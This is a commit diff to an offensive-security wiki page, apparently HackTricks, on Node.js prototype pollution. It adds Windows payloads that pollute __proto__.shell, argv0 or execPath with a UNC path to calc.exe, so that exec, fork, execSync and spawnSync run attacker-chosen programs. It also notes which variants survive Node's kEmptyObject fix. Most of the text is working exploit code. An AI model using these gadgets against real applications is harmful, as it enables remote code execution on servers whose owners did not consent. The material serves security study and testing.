GitBook: [#3640] No subject
This commit is contained in:
parent
a69eb0b9c0
commit
0fd67548bc
1 changed files with 44 additions and 3 deletions
|
@ -189,6 +189,13 @@ var proc = exec('something');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { exec } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = exec('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -213,6 +220,8 @@ var proc = execFile('/usr/bin/node');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows - not working
|
||||
```
|
||||
|
||||
For **`execFile`** to work it **MUST execute node** for the NODE\_OPTIONS to work.\
|
||||
|
@ -257,10 +266,11 @@ b.__proto__.argv0 = "/bin/sh"
|
|||
b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
|
||||
var proc = fork('./a_file.js');
|
||||
|
||||
//With a Windows Remote payloadPayload
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { fork } = require('child_process');
|
||||
b = {}
|
||||
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\cmd.exe"
|
||||
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = fork('./a_file.js');
|
||||
```
|
||||
{% endcode %}
|
||||
|
@ -299,6 +309,14 @@ var proc = spawn('something');
|
|||
|
||||
// stdin trick - not working
|
||||
// Not using stdin
|
||||
|
||||
// Windows
|
||||
// NOT working after require(fix) without options
|
||||
const { spawn } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = spawn('something');
|
||||
//var proc = spawn('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -338,6 +356,14 @@ p.__proto__.argv0 = "/usr/bin/vim"
|
|||
p.__proto__.shell = "/usr/bin/vim"
|
||||
p.__proto__.input = ':!{touch /tmp/execFileSync-stdin}\n'
|
||||
var proc = execFileSync('something');
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { execSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
p.__proto__.argv0 = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = execSync('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -377,6 +403,13 @@ p.__proto__.argv0 = "/usr/bin/vim"
|
|||
p.__proto__.shell = "/usr/bin/vim"
|
||||
p.__proto__.input = ':!{touch /tmp/execSync-stdin}\n'
|
||||
var proc = execSync('something');
|
||||
|
||||
// Windows
|
||||
// Working after kEmptyObject (fix)
|
||||
const { execSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = execSync('something');
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -421,6 +454,14 @@ p.__proto__.shell = "/usr/bin/vim"
|
|||
p.__proto__.input = ':!{touch /tmp/spawnSync-stdin}\n'
|
||||
var proc = spawnSync('something');
|
||||
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
|
||||
|
||||
// Windows
|
||||
// NOT working after require(fix) without options
|
||||
const { spawnSync } = require('child_process');
|
||||
p = {}
|
||||
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
|
||||
var proc = spawnSync('something');
|
||||
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
|
@ -621,7 +662,7 @@ Please, note that prototype pollution works if the **attribute** of an object th
|
|||
In Jun 2022 from [**this commit**](https://github.com/nodejs/node/commit/20b0df1d1eba957ea30ba618528debbe02a97c6a) the var `options` instead of a `{}` is a **`kEmptyObject`**. Which **prevents a prototype pollution** from affecting the **attributes** of **`options`** to obtain RCE.\
|
||||
At least from v18.4.0 this protection has been **implemented,** and therefore the `spawn` and `spawnSync` **exploits** affecting the methods **no longer work** (if no `options` are used!).
|
||||
|
||||
In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to \*\*`kEmptyObject` \*\* instead of **`{}`.**
|
||||
In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156cadc1b3492eac3941dd9) the **prototype pollution** of **`contextExtensions`** from the vm library was **also kind of fixed** setting options to **`kEmptyObject` ** instead of **`{}`.**
|
||||
|
||||
## References
|
||||
|
||||
|
|